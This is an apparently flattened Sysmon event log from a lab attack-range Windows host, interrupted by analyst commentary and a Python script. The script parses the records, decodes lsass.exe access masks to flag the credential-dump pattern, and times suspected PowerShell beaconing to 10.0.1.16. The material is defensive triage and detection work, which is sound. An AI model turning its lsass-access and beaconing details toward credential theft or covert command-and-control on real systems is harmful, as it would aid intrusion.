18:18:34.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9279FD0D0FE1CC7284A0BB730FF60F,SHA256=BDBF4BF296B3F4F373B7F0DEC67216059FE749C413C992AC33AB422B911BEC45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:34.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4F5552FBBAF79AC27F94B7839ED44C1,SHA256=9EFB5736412E6108CD22BB779C4B83551BFBF2987D304DBAD3B1FA6439FAE96C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
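The records around this point are Sysmon events from win-host-987 whose XML element values were exported run together: each record opens with the System header (EventID, Version, Level, Task, Opcode, the Keywords value 0x8000000000000000, EventRecordID, Channel, Computer, UtcTime) and then the EventData values in schema order, so a record beginning 10341000x8000000000000000 is an Event 10 (ProcessAccess), 354300x8000000000000000 an Event 3 (NetworkConnect), 23542300x... an Event 23 (FileDelete), 734700x... an Event 7 (ImageLoad) and 22542200x... an Event 22 (DNS query). Read that way, most of this stretch is the Splunk Universal Forwarder at work (splunkd.exe spawning splunk-powershell.exe and splunk-netmon.exe as SYSTEM, streamfwd.exe PID 3616 connecting to 10.0.1.12:8000, splunk-winevtlog.exe deleting its checkpoint files); the FileDelete records' Archived value "false - insufficient disk space" means those deleted files were hashed but not preserved in the Sysmon archive directory, so the hashes are all an investigator gets from them.

Three things here deserve a second look. First, the Event 10 records at 18:18:28.300 and 18:18:28.299 have lsass.exe as the SourceImage and powershell.exe PID 5504 (ATTACKRANGE\REED_SCHMIDT) as the TargetImage, GrantedAccess 0x1478 and 0x1000, with call traces through lsasrv.dll and SspiSrv.dll: that is the LSA server opening the process that is calling it over RPC while it services that caller's SSPI authentication request, the mirror image of a credential dump (lsass.exe as TargetImage with PROCESS_VM_READ, 0x10, in the mask), and none of the records in this stretch has the dump shape. The Event 7 load of cryptdll.dll, the Cryptography Manager library Kerberos clients use for their encryption types, into the same PID at 18:18:28.314 fits the same authentication activity. Second, the Event 3 and Event 22 records for PID 5504 at 18:18:54 carry "<unknown process>" and an all-zero ProcessGuid: Sysmon writes that when it cannot map the PID at the time it processes the (delayed) network event, normally because the process has already exited, so the PID has to be correlated by hand with the ProcessAccess and ImageLoad records above, with the usual caveat about PID reuse. That process resolved win-dc-128.attackrange.local, then connected to the domain controller 10.0.1.14 on 389 (ldap), 135 (epmap) and 49666 (a dynamic RPC endpoint handed out by the endpoint mapper) and once to 10.0.1.16:8000, while the kernel (PID 4, System) opened SMB sessions to 10.0.1.14:445. Third, powershell.exe PID 6940, also as REED_SCHMIDT, connects outbound to 10.0.1.16 (ip-10-0-1-16.us-west-2.compute.internal) on 443 at 18:18:53.566, 18:18:54.817, 18:18:58.834 and 18:19:03.849 (source ports 56806, 56816, 56817, 56819); short-interval repeat HTTPS from an interactive PowerShell is the beaconing pattern worth timing, and since neither EventRecordID nor UtcTime is monotonic in this listing, sort by UtcTime before measuring it.

The flattening also destroys two field boundaries that no regex can restore on its own: SourceProcessId and SourceThreadId in Event 10 ("6361736" is PID 636 + TID 1736 or PID 6361 + TID 736) and Hostname and Port in Event 3 ("WIN-DC-128389ldap"). The Python below is an added example, not code from this page, from the dataset, or from Sysmon or Splunk tooling. It parses this flattened layout back into fields and runs the checks above on records copied from this page; the PROCESS_* names follow winnt.h, the port-name table holds only the names that occur here, and where a hostname ends in a digit and Sysmon supplied no port name the parser falls back to a hostname recovered from another record in the same stream (which is how the 49666 connection gets its hostname) and otherwise reports the port as None rather than guess.

```python
"""Parse the delimiter-less Sysmon export on this page and triage Events 3 and 10.
Added example, not part of the dataset or of Sysmon/Splunk tooling.  It assumes the layout
visible above (XML element values concatenated in schema order with no separator, records
wrapped across lines at spaces).  SAMPLE is copied from records on this page."""
import re
from datetime import datetime

# System header: EventID, Version, Level, Task (== EventID), Opcode, then Keywords
# 0x8000000000000000, the one literal that reliably marks where a record starts.
HEADER = re.compile(r"(?P<eid>\d{1,2})(?P<ver>\d)(?P<level>\d)(?P=eid)0"
                    r"0x8000000000000000(?P<rid>\d+)Microsoft-Windows-Sysmon/Operational"
                    r"(?P<host>.+?)-(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})")
IMAGE = r"(?:[A-Za-z]:\\.+?\.exe|System|<unknown process>)"
# Event 10: SourceProcessId+SourceThreadId are fused ("6361736" is 636+1736 or 6361+736) and
# stay raw; the target PID is delimited by the image path that follows it.
PROCESS_ACCESS = re.compile(r"^\{(?P<sguid>[0-9A-F-]+)\}(?P<spid_tid>\d+)(?P<simage>" + IMAGE + r")"
                            r"\{(?P<tguid>[0-9A-F-]+)\}(?P<tpid>\d+)(?P<timage>" + IMAGE + r")"
                            r"(?P<access>0x[0-9a-f]+)(?P<trace>.*)$")
# Event 3: Hostname+Port are fused too ("WIN-DC-128389ldap"); see split_host_port.
NETWORK = re.compile(r"^\{(?P<guid>[0-9A-F-]+)\}(?P<pid>\d+)(?P<image>" + IMAGE + r")(?P<user>.*?)"
                     r"(?P<proto>tcp|udp)(?P<initiated>true|false)(?P<src6>true|false)"
                     r"(?P<srcip>\d+\.\d+\.\d+\.\d+)(?P<srctail>.*?)(?P<srcname>[a-z][a-z-]*|-)"
                     r"(?P<dst6>true|false)(?P<dstip>\d+\.\d+\.\d+\.\d+)(?P<dsttail>.*?)"
                     r"(?P<dstname>[a-z][a-z-]*|-)$")
PORT_BY_NAME = {"https": 443, "ldap": 389, "epmap": 135, "microsoft-ds": 445}  # names seen on this page
PROCESS_RIGHTS = {  # winnt.h PROCESS_* bits plus the standard rights in the high word
    0x1: "TERMINATE", 0x2: "CREATE_THREAD", 0x4: "SET_SESSIONID", 0x8: "VM_OPERATION", 0x10: "VM_READ",
    0x20: "VM_WRITE", 0x40: "DUP_HANDLE", 0x80: "CREATE_PROCESS", 0x100: "SET_QUOTA",
    0x200: "SET_INFORMATION", 0x400: "QUERY_INFORMATION", 0x800: "SUSPEND_RESUME",
    0x1000: "QUERY_LIMITED_INFORMATION", 0x2000: "SET_LIMITED_INFORMATION", 0x10000: "DELETE",
    0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}
LSASS = r"c:\windows\system32\lsass.exe"

def decode_access(mask):
    """GrantedAccess mask -> right names in bit order; 0x1fffff is PROCESS_ALL_ACCESS."""
    if mask & 0x1FFFFF == 0x1FFFFF:
        return ["ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

def split_host_port(tail, portname, known_hosts=()):
    """Undo the Hostname+Port fusion.  A Sysmon port name (ldap -> 389) or a hostname recovered from
    another record settles it; otherwise the split is only safe when the hostname ends in a
    non-digit, and the port is reported as None rather than guessed."""
    if portname in PORT_BY_NAME and tail.endswith(str(PORT_BY_NAME[portname])):
        return tail[:-len(str(PORT_BY_NAME[portname]))], PORT_BY_NAME[portname]
    for host in known_hosts:
        rest = tail[len(host):]
        if tail.startswith(host) and rest.isdigit() and 0 < int(rest) <= 65535:
            return host, int(rest)
    m = re.fullmatch(r"(.*\D)(\d{1,5})", tail)
    return (m.group(1), int(m.group(2))) if m else (tail, None)

def parse(text):
    """Split a flattened dump into record dicts: eid, rid, ts plus the event's own fields."""
    text = re.sub(r"\s+", " ", text)  # re-join records the export wrapped across lines
    heads = list(HEADER.finditer(text))
    records = []
    for h, nxt in zip(heads, heads[1:] + [None]):
        body = text[h.end():nxt.start() if nxt else len(text)].strip()
        rec = {"eid": int(h["eid"]), "rid": int(h["rid"]), "ts": datetime.strptime(h["ts"], "%Y-%m-%d %H:%M:%S.%f")}
        parser = {10: PROCESS_ACCESS, 3: NETWORK}.get(rec["eid"])
        m = parser.match(body) if parser else None
        rec.update({k: int(v) if k in ("pid", "tpid") else v for k, v in m.groupdict().items()} if m else {"raw": body})
        if m and rec["eid"] == 10:
            rec["access"], rec["trace"] = int(m["access"], 16), m["trace"].split("|")
        records.append(rec)
    net = [r for r in records if "dsttail" in r]
    for r in net:  # pass 1: records Sysmon gave a port name yield unambiguous hostnames
        r["srchost"], r["srcport"] = split_host_port(r["srctail"], r["srcname"])
        r["dsthost"], r["dstport"] = split_host_port(r["dsttail"], r["dstname"])
    known = {r["dsthost"] for r in net if r["dstport"] is not None}
    for r in net:  # pass 2: reuse those hostnames where the port had no name (49666 in SAMPLE)
        if r["dstport"] is None:
            r["dsthost"], r["dstport"] = split_host_port(r["dsttail"], r["dstname"], known)
    return records

def lsass_access(records):
    """(verdict, other image, rights, suspicious) for ProcessAccess records involving lsass.  lsass as
    *target* with VM_READ or ALL_ACCESS is the credential-dump shape; lsass as *source* opening a
    client through lsasrv/SspiSrv is the LSA servicing that client's own authentication call."""
    out = []
    for r in (r for r in records if r["eid"] == 10 and "access" in r):
        rights = decode_access(r["access"])
        if r["timage"].lower() == LSASS:
            out.append(("handle-to-lsass", r["simage"], rights, "VM_READ" in rights or rights == ["ALL_ACCESS"]))
        elif r["simage"].lower() == LSASS:
            via_lsa = any(re.search(r"lsasrv\.dll|sspisrv\.dll", f, re.I) for f in r["trace"])
            out.append(("lsa-serving-client" if via_lsa else "lsass-opened-process", r["timage"], rights, not via_lsa))
    return out

def beacon_intervals(records, dstip, dstport):
    """Seconds between successive outbound connections to one endpoint, in time order."""
    ts = sorted(r["ts"] for r in records if r.get("initiated") == "true"
                and r.get("dstip") == dstip and r.get("dstport") == dstport)
    return [round((b - a).total_seconds(), 3) for a, b in zip(ts, ts[1:])]

# Records copied from this page; the first keeps the export's line wrap inside UtcTime.
SAMPLE = r"""
10341000x800000000000000035086195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09
18:18:28.300{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
354300x800000000000000035086206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.566{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56806-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035086229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56816-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035086233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:58.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56817-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035086243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:03.849{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56819-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035086224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.505{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56813-false10.0.1.14WIN-DC-128389ldap
354300x800000000000000035086226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.519{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56815-false10.0.1.14WIN-DC-12849666-
"""
```

On SAMPLE, parse() yields one Event 10 and six Event 3 records; lsass_access() returns a single ("lsa-serving-client", ...powershell.exe, [VM_OPERATION, VM_READ, VM_WRITE, DUP_HANDLE, QUERY_INFORMATION, QUERY_LIMITED_INFORMATION], False) tuple, beacon_intervals(recs, "10.0.1.16", 443) returns 1.251, 4.017 and 5.015 seconds, and the source-port 56815 record comes back as WIN-DC-128 port 49666 only because the 56813 ldap record fixed the hostname first, so hand the parser a whole batch rather than single records. decode_access(0x1400), the mask svchost.exe uses on sysmon64.exe throughout this listing, is just the two QUERY rights; a mask with VM_READ against lsass.exe as the target is what the handle-to-lsass branch flags.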
23542300x800000000000000035086299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.548{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1049DDDB7BAB305AAEC352C575BDFD11,SHA256=32021C92DA355A22E7DD13C5B1D4AA0DF1522D87AD677C5D13942C8F25E8C29A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34230DB5750043709B20AF21A289574F,SHA256=E1253D9CDA032F1327D426F37BBCD56B327210539060F667F466F744C10D177B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.579{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=95640EC77AF7CBE9082E34D509BF9DE2,SHA256=B3C86A22925640ED922B69B0440594D1AB5FF2A7A2D3CF20D5515DF5D3EEFA53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:55.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=151EC02D01DCA4FB16EAE334C3A1C0C6,SHA256=0870834B9F0C9971642A08DF9C981CA27E76B5FF2DB461FD8B7E3D5C233FDC44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.994{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:56.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=474BB37596D8C35B5BA7AE2EFCA1DCF3,SHA256=259DB183F412D45CC67B62B926CB300540A3868B55E7A4C523202AB1BFCC01C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.072{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56830-false10.0.1.12-8000- 354300x800000000000000035086305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.003{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56829-false10.0.1.12-8089- 354300x800000000000000035086304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.558{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56828-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:57.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95AB3A1DA1E826F066C36869279B9E14,SHA256=71FA8EF4598A0B088266F6530532C90BB02A77E17CFACADD634E76A04E5065AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:58.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F827FA9FD28EAB117699BBFACB8D3225,SHA256=C54D9F124A960840637FB1EFF7F48664ACA9E6AB7075DBC628F12AD608BC5C69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:59.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB54A385EB7CA2699C753C9BF2A15B64,SHA256=80BBE488929364614A16176439134AC76D3B0E5EB8C10B8B9995A2811D4CE750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:59.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=80E99C40031D9D8E578E3286F1EB63E0,SHA256=CB9921124F0D91E218628818B39ADB3963B5CE825513D07FD6A57D0B5DE6A13A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:00.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A017B83BF2F20980BABE392F118AEDF,SHA256=3CF30EE111A1B38B413D82CEB21949EB97F684BF9FEF2E75897BB5A425A37854,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:24.568{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56831-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:01.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241EADA11A5137B25E19FDF359BD9DD1,SHA256=A3AE0193C3CC7B021217885D3DB4D793B9FF02A00DC3B815732397B7FC2080E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:26.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56832-false10.0.1.12-8000- 23542300x800000000000000035086316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:02.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE8A41033CE99E9BEB032B4DAD4370D,SHA256=6E68D41810FF2286C597FA4ADD1DB412AA388ABAA6E7A296293D8ED90D6B3856,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:03.786{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340E3F888C0ADB5840FB345A0812608C,SHA256=8C8C3FC220D19EBD94890FB0B054134EEA1CC43F932CE3E1FB73632E1E9CB158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:04.802{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413BFBD2128A22B5E4D15228131B6C07,SHA256=7A06630F966CC5378E0DD9353AD1347A38E57E2A92B91BA2C55F09570239B6F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:05.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B866C84DA327006537488F58720DC7,SHA256=F86919DC47C9CE03C81B463FD65BA0290214D384232B58F1371C147ED232F6C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:05.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=13279D459CA46D03F225522F560DFA2D,SHA256=6F73BC4A53D20F9A0297A441566610F3E8A6A01A1D05120BA783A65E43D3084F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:06.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=822F85AF8DDF758F5D034B1FDC6322D6,SHA256=8FF6BE849B31364805EF8667B4A6B369283CBB38C29BA69621A0A49476E50695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:30.580{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56833-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:07.866{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90B603EB2725DD31E3C28F8589155F11,SHA256=29CCDCB21EF7B6A0F70EFD0659C74472DAD5012642FE455CD69DDD0CAB8670E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:32.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56834-false10.0.1.12-8000- 23542300x800000000000000035086324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:08.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63D29D6ACB0D81D6879F688782F73AC,SHA256=D1C68CC8C683905238FBF240B79B3C824818130C6033E0A07EEC2EF84123311C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.898{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=387DAE04B216517785D99CDAB7A363CD,SHA256=3399357F98CCD850C98BB9232CADF5713F6B169DAA682455045AD6F190376522,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 